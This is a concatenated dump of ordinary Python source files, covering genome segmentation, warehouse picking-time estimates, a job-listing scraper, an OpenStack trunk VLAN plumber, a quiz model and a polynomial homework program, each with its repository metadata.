labels[s:e] = int(i[3])\n return labels\n\ndef extend_labels(labelchrs, label, interval_starts, interval_ends):\n for l, s, e in zip(label, interval_starts, interval_ends):\n labelchrs[s:e] = l\n\ndef hextodecimal(hexc):\n return f\"{int(hexc[1:3],16)},{int(hexc[3:5],16)},{int(hexc[5:7],16)}\"\n\ndef convert_to_bed(labels,chr):\n unique_labels = np.unique(labels)\n colors = distinctipy.get_colors(len(unique_labels))\n colors = [distinctipy.get_hex(i) for i in colors]\n data = {i:[(0,0)] for i in unique_labels}\n write = False\n currs = 0\n currl = labels[0]\n for i,l in enumerate(labels):\n if l != currl or i == len(labels) - 1:\n data[currl].append((i-currs,currs))\n currl = l\n currs = i\n bbed = \"\"\n comma = \",\"\n for k,i in enumerate(data):\n color = hextodecimal(colors[k])\n data[i].append((1,len(labels)-1))\n bbed = bbed + chr + \"\\t0\\t\" + str(len(labels)) + \"\\t\" + str(i) + \"\\t1000\\t.\\t0\\t\" + str(len(labels)) + \"\\t\" + color + \"\\t\" + str(len(data[i])) + \"\\t\" + comma.join([str(i[0]) for i in data[i]]) + \"\\t\" + comma.join([str(i[1]) for i in data[i]]) + \"\\n\"\n return bbed\n\ndef write_text(text, path):\n with open(path, \"w\") as file:\n file.write(text)\n\ndef copy_binned(outvec, invec, bin_size):\n if len(invec) % bin_size == 0:\n outvec[:] = invec.reshape(-1, bin_size).mean(axis=1)\n else:\n outvec[:-1] = invec[:int(bin_size * (len(outvec)-1))].reshape(-1, bin_size).mean(axis=1)\n outvec[-1] = invec[int(bin_size * (len(outvec)-1)):].mean()\n\nclass GenomeReader:\n '''\n Reader for a genome. It takes a list of bw files. It reads a bed file of indexes for training regions and returns the signal values for those regions.\n bwpath: path to the directory where the bw files are restored.\n bedpath: path to the bed files that keeps training indexes.\n binsize: size of the bins\n chrsizes: dictionary of chromosome sizes.\n '''\n def __init__(self, bwpath, binsize, lambdapath, chrsizepath, include):\n self.bwpath = bwpath\n self.binsize = binsize\n self.bwfiles = sorted(glob.glob(os.path.join(self.bwpath,\"*.bw\")))\n self.nbwpath = len(self.bwfiles)\n self.lambdas = _read_arr(lambdapath)\n self.chrsizes = _read_dict(chrsizepath)\n self.include = include\n\n def nbw(self):\n return len(self.bwfiles)\n\n def get_binned_training_mat(self, i):\n '''\n Read the ith training chunk as a matrix with binning.\n '''\n out = np.empty((self.nbwpath, self.get_chunk_size(i)))\n for j, f in enumerate(self.bwfiles):\n _read_from_bigwig_binned(out[j], f, self.chrs[i], self.starts[i], self.ends[i], self.binsize)\n return out, self.starts[i], self.ends[i], self.chrs[i]\n\n def get_binned_training_vec(self, vec, i, j):\n '''\n Read the ith training chunk from jth bw file as a matrix with binning.\n '''\n _read_from_bigwig_binned(vec[:], self.bwfiles[j], self.chrs[i], self.starts[i], self.ends[i], self.binsize)\n return self.start[i], self.ends[i], self.chrs[i], self.bwfiles[j]\n\n def get_exact_training_mat(self, i):\n '''\n Read the ith training chunk as a matrix without binning.\n '''\n out = np.empty((self.nbwpath, self.ends[i] - self.starts[i]))\n for j, f in enumerate(self.bwfiles):\n _read_from_bigwig(out[j], f, self.chrs[i], self.starts[i], self.ends[i])\n return out, self.start[i], self.ends[i], self.chrs[i]\n\n def get_exact_training_vec(self, vec, i, j):\n '''\n Read the ith training chunk from jth bw file as a matrix without binning.\n '''\n _read_from_bigwig(vec[:], self.bwfiles[j], self.chrs[i], self.starts[i], self.ends[i])\n return self.start[i], self.ends[i], self.chrs[i], self.bwfiles[j]\n\n def get_bin(self, chr, index, j, offset):\n out = np.empty(self.binsize)\n _read_from_bigwig(out, self.bwfiles[j], chr, offset + index * self.binsize, offset + (index+1) * self.binsize)\n return out\n\n def read_l0_approx(self, chr, start, end):\n init_size = int(200)\n if end > self.chrsizes[chr]:\n end = self.chrsizes[chr]\n binvec = np.empty(self.binsize)\n length = end - start\n binned_length = int(np.ceil((end - start)/self.binsize))\n mat = np.empty((len(self.bwfiles), length))\n for i, f in enumerate(self.bwfiles):\n _read_from_bigwig(mat[i], f, chr, start, end)\n vecbinned = np.empty(binned_length)\n breakpoints = np.empty(init_size, dtype=int)\n iibreakpoints = 0\n\n for j, f in enumerate(self.bwfiles):\n copy_binned(vecbinned, mat[j], self.binsize)\n bps = l0poissonapproximateCondensed(vecbinned, self.lambdas[j])[1][:-1]\n for k in range(len(bps)):\n s, e = bps[k]*self.binsize, (bps[k]+1)*self.binsize #start+bps[k]*self.binsize, start+(bps[k]+1)*self.binsize\n if e > self.chrsizes[chr]:\n e = self.chrsizes[chr]\n if init_size <= iibreakpoints + k:\n tmp = np.empty(int(init_size * 2), dtype=int)\n tmp[:init_size] = breakpoints\n init_size = int(init_size*2)\n breakpoints = tmp\n\n breakpoints[iibreakpoints+k] = bps[k]*self.binsize+l0poissonbreakpoint(mat[j,s:e]) #start+bps[k]*self.binsize+l0poissonbreakpoint(mat[j,s:e])\n iibreakpoints += len(bps)\n \n breakpoints = np.unique(breakpoints[:iibreakpoints])\n if self.include == \"lengths\":\n out = np.empty((len(breakpoints)+1, len(self.bwfiles)+1))\n mat = mat.T\n if len(breakpoints) == 0:\n out[0,:-1] = mat.mean(axis=0)\n out[0,-1] = end - start\n else:\n out[0,:-1] = mat[0:breakpoints[0]].mean(axis=0)\n out[0,-1] = breakpoints[0]\n for i in range(1,len(breakpoints)):\n out[i,:-1] = mat[breakpoints[i-1]:breakpoints[i]].mean(axis=0)\n out[i,-1] = breakpoints[i]-breakpoints[i-1]\n out[-1,:-1] = mat[breakpoints[-1]:].mean(axis=0)\n out[-1,-1] = end - breakpoints[-1] - start\n elif self.include == \"neighbors\":\n out = np.empty((len(breakpoints)+1, 3*(len(self.bwfiles)+1)))\n k = len(self.bwfiles)+1\n mat = mat.T\n if len(breakpoints) == 0:\n out[0,k:2*k-1] = mat.mean(axis=0)\n out[0,2*k-1] = end - start\n out[0,:k] = 0\n out[0,2*k:] = 0 \n else:\n out[0,k:2*k-1] = mat[0:breakpoints[0]].mean(axis=0)\n out[0,2*k-1] = breakpoints[0]\n for i in range(1,len(breakpoints)):\n out[i,k:2*k-1] = mat[breakpoints[i-1]:breakpoints[i]].mean(axis=0)\n out[i,2*k-1] = breakpoints[i]-breakpoints[i-1]\n out[-1,k:2*k-1] = mat[breakpoints[-1]:].mean(axis=0)\n out[-1,2*k-1] = end - breakpoints[-1] - start\n out[1:, :k] = out[:-1,k:2*k]\n out[0, :k] = 0\n out[:-1,2*k:] = out[1:,k:2*k]\n out[-1, 2*k:] = 0 \n else:\n out = np.empty((len(breakpoints)+1, len(self.bwfiles)))\n mat = mat.T\n if len(breakpoints) == 0:\n out[0] = mat.mean(axis=0)\n else:\n out[0] = mat[0:breakpoints[0]].mean(axis=0)\n for i in range(1,len(breakpoints)):\n out[i] = mat[breakpoints[i-1]:breakpoints[i]].mean(axis=0)\n out[-1] = mat[breakpoints[-1]:].mean(axis=0)\n\n\n return out, np.r_[start, start + breakpoints], np.r_[start + breakpoints, end]\n \nclass Segmentor:\n def __init__(self, bwpath, binsize, lambdapath, chrsizepath, bedpath, outputpath, include = None, chunksize = 10000000, nsample=2000, n_components=25, random_state=42, max_iter=2000, covariance_type=\"full\", init_params=\"kmeans\", weight_concentration_prior_type=\"dirichlet_process\"):\n self.reader = GenomeReader(bwpath, binsize, lambdapath, chrsizepath, include)\n self.nsample = nsample\n self.chunksize = chunksize\n self.bedpath = bedpath\n self.chrs, self.starts, self.ends = _read_bed(self.bedpath)\n self.nchunk = len(self.chrs)\n self.chrsizes = _read_dict(chrsizepath)\n self.outputpath = outputpath\n self.rng = np.random.default_rng(seed=42)\n self.gmm = BayesianGaussianMixture(n_components=n_components, random_state=random_state, max_iter=max_iter, covariance_type=covariance_type, init_params=init_params, weight_concentration_prior_type=weight_concentration_prior_type)\n\n def train_gmm(self):\n traindata = np.empty((self.nchunk*self.nsample, self.reader.nbw()))\n for i, c, s, e in zip(range(self.nchunk), self.chrs, self.starts, self.ends):\n tmp = self.reader.read_l0_approx(c,s,e)[0]\n traindata[(i*self.nsample):((i+1)*self.nsample)] = tmp[self.rng.choice(range(tmp.shape[0]), self.nsample, replace=False)]\n self.gmm.fit(traindata)\n\n def label_data(self, verbose=False):\n bed = \"\"\n for i in self.chrsizes.keys():\n labelchrs = np.empty(self.chrsizes[i], dtype=int)\n ii = 0\n cont = True\n while cont:\n s, e = ii, ii+self.chunksize\n ii += self.chunksize\n if e > self.chrsizes[i]:\n e = self.chrsizes[i]\n cont = False\n if verbose: print(f\"Labeling chromosome {i}: {s}-{e}\")\n if verbose: print(f\"\\tReading L0 approximation\")\n data, interval_starts, interval_ends = self.reader.read_l0_approx(i, s, e)\n if verbose: print(f\"\\tCarrying out predictions\")\n labels = self.gmm.predict(data)\n if verbose: print(f\"\\tExpanding labels\")\n extend_labels(labelchrs, labels, interval_starts, interval_ends)\n bed += convert_to_bed(labelchrs, i)\n if verbose: print(f\"\\tWriting labels\")\n write_text(bed, self.outputpath)\n\n","repo_name":"boooooogey/FPseg","sub_path":"FPseg/segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":15258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4681659074","text":"# Import modules\nimport pandas as pd\nimport datetime\nfrom wagonworks.get_data import get_day_data\n\n\n# Process time should beinput arguments\nprocess_tasks_time = {'scan_time': 3,\n 'confirm_location': 2,\n 'pick_time': 8,\n 'confirm_pick': 2,\n 'confirm_box': 5}\n\n\ndef discrete_time(order_df, process_tasks_time):\n '''\n This function calculates the total time to complete all given orders using\n discrete picking method.\n Input is:\n - order_df: a dataframe containing all the order IDs and corresponding SKU\n IDs to be\n completed. (Possibly recommend orders in one hour)\n - process_tasks_time: a dictionary containing the process tasks per order\n and their average time.\n\n Output is:\n - Dataframe with:\n - Del_Number: Order ID\n - Discrete_travel_time: the return travel time per order\n - Discrete_total_order_time: the total time per order (travel time and\n process time)\n - The total time to complete all orders (in days/hours)\n '''\n\n # Get sku_location_time reference table which gives a one-way travel time\n # for each location zone and SKU\n sku_location_time_df = pd.read_csv(\n '../raw_data/reference_data/sku_location_time.csv')\n\n # Merge order_df and sku_location_time_df to get the average travel time\n # for each SKU\n order_merge_df = order_df.merge(sku_location_time_df,\n how='left',\n on='SKU',\n copy=False)\n\n # Group together by order number to get the total travel time per order\n order_grouped_df = order_merge_df.groupby('Del_Number').sum('TIME') * 2\n\n # Calculate total order time (adding on process time)\n order_grouped_df['Discrete_total_order_time'] = \\\n order_grouped_df['TIME'] + sum(process_tasks_time.values())\n\n # Keep only time columns\n order_grouped_df = order_grouped_df[['TIME', 'Discrete_total_order_time']]\n\n # Change column names\n order_grouped_df.columns = ['Discrete_travel_time',\n 'Discrete_total_order_time']\n\n # Convert seconds to hh:mm:ss format\n total_time_sec = int(order_grouped_df['Discrete_total_order_time'].sum())\n total_time = str(datetime.timedelta(seconds=total_time_sec))\n\n # Return the total time it takes to complete all orders\n return order_grouped_df, total_time\n\n\ndef batch_time(order_df, batch_df, process_tasks_time, sort_time=20):\n '''\n Input is:\n - order_df: a dataframe containing all the order IDs and corresponding SKU\n IDs to be completed.\n - batch_df: a dataframe containing all the order IDs and corresponding\n batch IDs from batching analysis.\n - sku_location_time_df: a reference dataframe containing all unique\n possible SKU IDs with their corresponding location zone and average one-way\n travel time.\n - sort_time: time it takes to sort each SKU in a batch\n - process_tasks_time: a dictionary containing the process tasks per order\n and their average time.\n Output is:\n - Dataframe with:\n - Batch_Number\n - Total_batch_time: time per batch + process time per batch\n - The total time to complete all orders (in days/hours)\n '''\n\n # Get sku_location_time reference table which gives a one-way travel time\n # for each location zone and SKU\n sku_location_time_df = \\\n pd.read_csv('../raw_data/reference_data/sku_location_time.csv')\n\n # Merge order_df and batch_df so that we can associate batch and SKU IDs\n order_merged_df = order_df.merge(batch_df,\n how='left',\n on='Del_Number',\n copy=False)\n\n # Separate SKU-dependent process tasks and order-dependent process tasks:\n # Scan time is incorporated into sorting time for batches so is no longer\n # included in this step, confirm location, pick time and confirm pick all\n # happen once per SKU in a batch finally, confirm box will happen once per\n # order\n SKU_keys = ['confirm_location', 'pick_time', 'confirm_pick']\n SKU_process_time = {key: process_tasks_time[key] for key in SKU_keys}\n order_process_time = process_tasks_time['confirm_box']\n\n # Calculate time per batch\n # Get number of batches for loop range\n max_batch = order_merged_df['Batch_Number'].max()\n\n # Create empty dataframe to fill\n batch_time_df = pd.DataFrame({'Batch_Number': [],\n 'Batch_Time': []}, dtype=int)\n\n for batch in range(max_batch + 1):\n # Get all unique SKUs in each batch\n batch_grouped_df = \\\n pd.DataFrame(\n order_merged_df[order_merged_df['Batch_Number'] == batch]['SKU'].unique())\n batch_grouped_df.columns = ['SKU']\n\n # Merge SKUs list with sku_location_time_df\n batch_SKUs_merged_df = \\\n batch_grouped_df.merge(sku_location_time_df,\n how='left',\n on='SKU',\n copy=False).drop('SKU LOCATION', axis=1)\n\n # Add a column with total time per SKU in the batch\n batch_SKUs_merged_df['total_SKU_time'] = batch_SKUs_merged_df['TIME'] \\\n * 2 + sort_time\n\n # Drop time column\n batch_SKUs_merged_df = batch_SKUs_merged_df.drop('TIME', axis=1)\n\n # Create a dataframe with Batch_Number and time\n # First get number of orders in the batch to multiply by order process\n # task time\n n_orders = len(\n order_merged_df[order_merged_df['Batch_Number'] == batch].groupby(\n 'Del_Number').count())\n process_time = sum(SKU_process_time.values()) + order_process_time * \\\n n_orders\n batch_time = batch_SKUs_merged_df['total_SKU_time'].sum() + \\\n process_time\n batch_time_df.loc[batch, ['Batch_Number', 'Batch_Time']] = \\\n [batch, batch_time]\n\n # Convert seconds to hh:mm:ss format\n total_time_sec = int(batch_time_df['Batch_Time'].sum())\n total_time = str(datetime.timedelta(seconds=total_time_sec))\n\n # Convert final dataframe to int\n batch_time_df = batch_time_df.astype(int)\n\n return batch_time_df, total_time\n\n","repo_name":"hunsa10/wagonworksui","sub_path":"wagonworksui/travel_time.py","file_name":"travel_time.py","file_ext":"py","file_size_in_byte":6408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69813034794","text":"N = int(input())\n*L, = map(int, input().split())\n\ninc=0\ndec=0\n# 1 2 3 4 5\nfor i in range(N-1,-1,-1):\n if L[i-1]<=L[i]:\n continue\n else:\n inc=i\n break\n\nmx1=1\n\n# 1 4 2 3 5\nif L[0]>=L[N-1]:\n for i in range(1,inc):\n if L[i-1]<=L[i]:\n continue\n else:\n mx1=-1\n break\nelse:\n if inc!=0:\n mx1=-1\n\nif mx1>0:\n mx1=inc\n\n\nfor i in range(N-1,-1,-1):\n if L[i-1]>=L[i]:\n continue\n else:\n dec=i\n break\n\nmx2=1\nif L[0]<=L[N-1]:\n for i in range(1,dec):\n if L[i-1]>=L[i]:\n continue\n else:\n mx2=-1\n break\nelse:\n if dec!=0:\n mx2=-1\nif mx2>0:\n mx2=dec\n\nif mx1<0 and mx2<0:\n print(-1)\nelse:\n if mx1<0:\n print(mx2)\n elif mx2<0:\n print(mx1)\n else:\n print(min(mx1,mx2))\n","repo_name":"JannaKim/PS","sub_path":"contest/20127_Y수열1114.py","file_name":"20127_Y수열1114.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33893251310","text":"import logging\n\nfrom app.models.users import User\nfrom app.schemas.users import UserCreate, UserUpdate\nfrom sqlalchemy.orm import Session\nfrom typing import List\nfrom uuid import UUID\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass UserController:\n @classmethod\n def get_users(cls, db: Session) -> List[User]:\n return db.query(User).order_by(User.username.asc()).all()\n\n @classmethod\n def get_user(cls, db: Session, id: UUID) -> User:\n return db.query(User).filter_by(id=id).one()\n\n @classmethod\n def create_user(cls, db: Session, payload: UserCreate) -> User:\n user = User()\n user.username = payload.username\n user.is_admin = payload.is_admin\n \n db.add(user)\n db.commit()\n\n return user\n\n @classmethod\n def update_user(cls, db: Session, id: UUID, payload: UserUpdate) -> User:\n user = cls.get_user(db, id)\n user.is_admin = payload.is_admin\n\n db.commit()\n\n return user\n\n @classmethod\n def delete_user(cls, db: Session, id: UUID) -> None:\n user = cls.get_user(db, id)\n\n db.delete(user)\n db.commit()\n\n @classmethod\n def get_or_create_user(cls, db: Session, username: str, is_admin: bool) -> User:\n user = db.query(User).filter_by(username=username).first()\n\n if not user:\n user = cls.create_user(db, UserCreate(username=username, is_admin=is_admin))\n else:\n if user.is_admin != is_admin:\n user = cls.update_user(db, user.id, UserUpdate(is_admin=is_admin))\n\n return user\n","repo_name":"rclsilver/face-recognition","sub_path":"server/app/controllers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5906827554","text":"from loguru import logger\nfrom models.db import db\n\n\nclass Answer(db.Model):\n __tablename__ = \"answers\"\n id = db.Column(db.Integer, primary_key=True)\n value = db.Column(db.String())\n is_true = db.Column(db.Boolean())\n question_id = db.Column(db.Integer, db.ForeignKey('questions.id'),\n nullable=False)\n\n def __init__(self, question_id: int, value: str, is_true: bool):\n self.question_id = question_id\n self.value = value\n self.is_true = is_true\n\n def render(self) -> dict:\n return {c.name: getattr(self, c.name) for c in self.__table__.columns}\n\n def __str__(self):\n return self.value\n\n @staticmethod\n def get_all_possible_answers(identifiant: int) -> list['Answer']:\n answers = Answer.query.filter_by(question_id=identifiant).all()\n db.session.commit()\n return answers\n\n @staticmethod\n def get_good_answer(identifiant: int) -> list['Answer']:\n answers = Answer.query.filter_by(question_id=identifiant).all()\n db.session.commit()\n answer = [answer for answer in answers if answer.is_true is True]\n return answer\n\n @staticmethod\n def create_answer(question_id: int, value: str, is_true: bool) -> None:\n answer = Answer(question_id, value=value, is_true=is_true)\n db.session.add(answer)\n db.session.commit()\n\n @staticmethod\n def delete_answer_by_id(identifiant: int) -> None:\n answer = Answer.query.filter_by(id=identifiant).first()\n db.session.delete(answer)\n db.session.commit()\n","repo_name":"Seedsir/zeventquizz","sub_path":"models/answers/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"34761728660","text":"\"\"\"\nthis is my first project to grab the iOS job info data from Lagou.com using Python\n\"\"\"\n\n__author__ = 'Yongxiang Miao'\n\nimport re\nimport time\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nfrom openpyxl import Workbook\n\nworkbook = Workbook()\ntab1 = workbook.active\ntab1.title = 'iOS开发招聘'\ndest_filename = 'iOS开发招聘数据.xlsx'\n\nBASE_URL = 'https://www.lagou.com/zhaopin/iOS/'\n\nRUN_TIME = 1\n\ndef randomChoices():\n proxy = ['http://163.125.149.106:9999',\n 'http://111.121.193.214:3128',\n 'https://122.72.18.35:80',\n 'http://114.115.182.59:3128',\n 'https://118.212.137.135:31288']\n agent = ['Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',\n 'Mozilla/5.0 (Windows; U; Windows NT 5.2) Gecko/2008070208 Firefox/3.0.1',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)']\n\n return random.choice(proxy), random.choice(agent)\n\n\ndef get_html(url):\n p, a = randomChoices()\n headers = dict(Connection='keep-alive')\n headers['User-Agent'] = a\n proxies = dict(http=p)\n data = requests.get(url, headers=headers, proxies=proxies).content\n\n return data\n\ndef parser_html(data):\n soup = BeautifulSoup(data, 'html.parser')\n pos_list = soup.select('ul.item_con_list > li')\n\n company = []\n position = []\n experience = []\n salary = []\n address = []\n\n for i in pos_list:\n\n c = i.get('data-company')\n p = i.find('h3').get_text()\n a = i.find('span', attrs={'class': 'add'}).get_text()\n li_b_l = i.find('div', attrs={'class': 'li_b_l'})\n e = li_b_l.find(text=re.compile('经验'))\n e = re.sub('\\s', '', e)\n s = li_b_l.find('span', attrs={'class': 'money'}).get_text()\n\n company.append(c)\n position.append(p)\n experience.append(e)\n salary.append(s)\n address.append(a)\n\n page = soup.find('a', attrs={'class': 'next'})\n if page:\n next_url = page['href']\n global RUN_TIME\n if RUN_TIME == 2:\n next_url += '?filterOption=2'\n elif RUN_TIME >= 3:\n next_url += '?filterOption=3'\n RUN_TIME += 1\n\n print('====================== : %s', next_url)\n\n return company, position, experience, salary, address, next_url\n return company, position, experience, salary, address, None\n\ndef main():\n\n global BASE_URL\n url = BASE_URL\n\n com = []\n pos = []\n exp = []\n sal = []\n add = []\n\n while url:\n data = get_html(url)\n co, po, ex, sa, ad, url = parser_html(data)\n\n com += co\n pos += po\n exp += ex\n sal += sa\n add += ad\n\n time.sleep(5)\n\n for c_, p_, e_, s_, a_ in zip(com, pos, exp, sal, add):\n col_A = 'A%s' % (com.index(c_) + 1)\n col_B = 'B%s' % (com.index(c_) + 1)\n col_C = 'C%s' % (com.index(c_) + 1)\n col_D = 'D%s' % (com.index(c_) + 1)\n col_E = 'E%s' % (com.index(c_) + 1)\n\n tab1[col_A] = c_\n tab1[col_B] = p_\n tab1[col_C] = e_\n tab1[col_D] = s_\n tab1[col_E] = a_\n\n workbook.save(filename=dest_filename)\n\n\nif __name__ == '__main__':\n main()","repo_name":"smilingmiao/Python","sub_path":"Lagou_iOS-1.py","file_name":"Lagou_iOS-1.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8672774511","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib.utils import runtime\nfrom oslo_concurrency import lockutils\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\n\nfrom neutron.agent.linux import ip_lib\nfrom neutron.plugins.ml2.drivers.linuxbridge.agent.common import utils as lutil\n\nLOG = logging.getLogger(__name__)\n\n\nclass Plumber(object):\n \"\"\"Object responsible for VLAN interface CRUD.\n\n This handles the creation/deletion/listing of VLAN interfaces for\n a trunk within a namespace.\n \"\"\"\n\n def __init__(self, namespace=None):\n self.namespace = namespace\n\n def trunk_on_host(self, trunk):\n \"\"\"Returns true if trunk device is present else False.\"\"\"\n trunk_dev = self._trunk_device_name(trunk)\n return ip_lib.device_exists(trunk_dev, namespace=self.namespace)\n\n def ensure_trunk_subports(self, trunk):\n \"\"\"Idempotent wiring for a trunk's subports.\n\n Given a trunk object, delete any vlan subinterfaces belonging to a\n trunk that aren't on the object. Create any which are on the object\n which do not exist.\n \"\"\"\n trunk_dev = self._trunk_device_name(trunk)\n with self._trunk_lock(trunk_dev):\n # lock scoped to trunk device so two diffs don't interleave\n expected = self._get_subport_devs_and_vlans(trunk.sub_ports)\n existing = self._get_vlan_children(trunk_dev)\n to_delete = existing - expected\n to_create = expected - existing\n for devname, vlan_id in to_delete:\n LOG.debug(\"Deleting subport %(name)s with vlan tag %(tag)s\",\n dict(name=devname, tag=vlan_id))\n self._safe_delete_device(devname)\n for devname, vlan_id in to_create:\n LOG.debug(\"Creating subport %(name)s with vlan tag %(tag)s\",\n dict(name=devname, tag=vlan_id))\n self._create_vlan_subint(trunk_dev, devname, vlan_id)\n\n def delete_trunk_subports(self, trunk):\n return self.delete_subports_by_port_id(trunk.port_id)\n\n def delete_subports_by_port_id(self, port_id):\n device = self._get_tap_device_name(port_id)\n if not ip_lib.device_exists(device, namespace=self.namespace):\n LOG.debug(\"Device %s not present on this host\", device)\n return\n with self._trunk_lock(device):\n for subname, vlan_id in self._get_vlan_children(device):\n LOG.debug(\"Deleting subport %(name)s with vlan tag %(tag)s\",\n dict(name=subname, tag=vlan_id))\n self._safe_delete_device(subname)\n\n def _trunk_lock(self, trunk_dev):\n lock_name = 'trunk-%s' % trunk_dev\n return lockutils.lock(lock_name, runtime.SYNCHRONIZED_PREFIX)\n\n def _create_vlan_subint(self, trunk_name, devname, vlan_id):\n ip_wrap = ip_lib.IPWrapper(namespace=self.namespace)\n try:\n dev = ip_wrap.add_vlan(devname, trunk_name, vlan_id)\n dev.disable_ipv6()\n except Exception:\n with excutils.save_and_reraise_exception() as ectx:\n ectx.reraise = ip_lib.IPDevice(\n devname, namespace=self.namespace).exists()\n\n def _safe_delete_device(self, devname):\n dev = ip_lib.IPDevice(devname, namespace=self.namespace)\n try:\n dev.link.set_down()\n dev.link.delete()\n except Exception:\n with excutils.save_and_reraise_exception() as ectx:\n ectx.reraise = dev.exists()\n\n def _trunk_device_name(self, trunk):\n return self._get_tap_device_name(trunk.port_id)\n\n def _get_subport_devs_and_vlans(self, subports):\n return {(self._get_tap_device_name(s.port_id),\n s.segmentation_id)\n for s in subports}\n\n def _get_tap_device_name(self, devname):\n return lutil.get_tap_device_name(devname)\n\n def _get_vlan_children(self, dev):\n \"\"\"Return set of (devname, vlan_id) tuples for children of device.\"\"\"\n devices = ip_lib.get_devices_info(namespace=self.namespace)\n return {(device['name'], device['vlan_id']) for device in devices\n if device.get('kind') == 'vlan' and\n device.get('parent_name') == dev}\n","repo_name":"openstack/neutron","sub_path":"neutron/services/trunk/drivers/linuxbridge/agent/trunk_plumber.py","file_name":"trunk_plumber.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","stars":1353,"dataset":"github-code","pt":"72"} +{"seq_id":"11417854863","text":"\"\"\"\n2021/CAU/CS/DATA STRUCTURE\n20172674 신동녘\nHW1\nPolynomial2\n\"\"\"\n\n\n# 다항식 클래스 선언부\nclass polynomial():\n def __init__(self, coef):\n self.coef_deg = coef\n self.degree = len(coef)\n\n # 다항식 출력함수\n def print_poly(self):\n for i in range(self.degree):\n if i == self.degree - 1:\n print(\"%d\" % (abs(self.coef_deg[i][0])))\n else:\n if self.coef_deg[i][0] != 0:\n print(\"%d * x^%d\" % (abs(self.coef_deg[i][0]), self.coef_deg[i][1]), end='')\n if self.coef_deg[i+1][0] >= 0:\n print(\" + \", end='')\n else:\n print(\" - \", end='')\n\n # 다항식에 계산 함수\n def calc_poly(self, num):\n result = 0\n for i in range(0, self.degree):\n result += self.coef_deg[i][0] * pow(num, self.coef_deg[i][1])\n return result\n\n\n# 두 다항식을 더하는 함수\ndef poly_add(a, b):\n z = [] # 결과를 담을 다항식 선언\n apos = bpos = 0 # 배열(다항식)을 순차적으로 탐색하기 위한 인덱스\n degree_a = a.degree # 다항식 a의 차수\n degree_b = b.degree # 다항식 b의 차수\n\n while(apos < degree_a) and (bpos < degree_b):\n # a가 차수가 더 높다면\n if a.coef_deg[apos][1] > b.coef_deg[bpos][1]:\n z.append([a.coef_deg[apos][0], a.coef_deg[apos][1]])\n apos += 1\n # a와 b가 차수가 같다면\n elif a.coef_deg[apos][1] == b.coef_deg[bpos][1]:\n z.append([a.coef_deg[apos][0] + b.coef_deg[bpos][0], a.coef_deg[apos][1]])\n apos += 1\n bpos += 1\n # b가 차수가 높다면\n else:\n z.append([b.coef_deg[bpos][0], b.coef_deg[bpos][1]])\n bpos += 1\n return polynomial(z)\n\ndef poly_mult(a, b):\n z = [] # 곱셈 결과를 담을 리스트 z\n z_list = [] # z가 가지고 있는 차수를 담을 리스트\n degree_a = a.degree # a의 차수\n degree_b = b.degree # b의 차수\n\n for i in range(degree_a):\n for j in range(degree_b):\n # 임시로 곱셈 결과를 해당 다항식의 방식대로 저장\n temp = [a.coef_deg[i][0]*b.coef_deg[j][0], a.coef_deg[i][1]+b.coef_deg[j][1]]\n if temp[1] in z_list: # 같은 차수가 이미 있다면\n for k in range(len(z)):\n # 해당 차수의 계수를 증가시켜준다.\n if z[k][1] == temp[1]:\n z[k][0] += temp[0]\n else: # 같은 차수가 없다면\n z.append(temp) # 임시 다항식을 z에 추가해주고\n z_list.append(temp[1]) # 해당 차수가 있음을 리스트에 추가하여 표기한다.\n\n return polynomial(z)\n\n\n# 수식 1과 2를 입력받는 부분\nprint(\"수식 1을 입력하세요: \", end='')\nexp1 = list(map(int, input().split()))\ntemp1 = []\nfor i in range(len(exp1)//2):\n temp1.append([exp1[i*2],exp1[i*2+1]])\na = polynomial(temp1)\n\nprint(\"수식 2를 입력하세요: \", end='')\nexp2 = list(map(int, input().split()))\ntemp2 = []\nfor i in range(len(exp2)//2):\n temp2.append([exp2[i*2],exp2[i*2+1]])\nb = polynomial(temp2)\n\n# 수식 1과 2에 대한 연산을 진행하는 부분\nc = poly_add(a, b)\nd = poly_mult(a, b)\nprint(\"수식 1+2 는 \", end='')\nc.print_poly()\nprint(\"수식 1*2 는 \", end='')\nd.print_poly()\nprint()\n\n# 수식 출력 후 계산 부분\nploy_list = [a, b, c, d] # 다항식을 한 데에 묶어 효과적으로 관리하기 위한 리스트 생성\nwhile (True):\n print(\"수식에 값을 넣으세요(ex: 1 1) \", end='')\n n, m = map(int, input().split())\n result = 0\n if n >= 1 and n <= 4:\n result = ploy_list[n-1].calc_poly(m)\n print(\"결과값은 %d\" % (result))\n else:\n print(\"입력이 잘못되었습니다.\")","repo_name":"nyeok98/2021_CS","sub_path":"Data Structure/과제1_20172674_신동녘/소스코드/polynomial_2.py","file_name":"polynomial_2.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 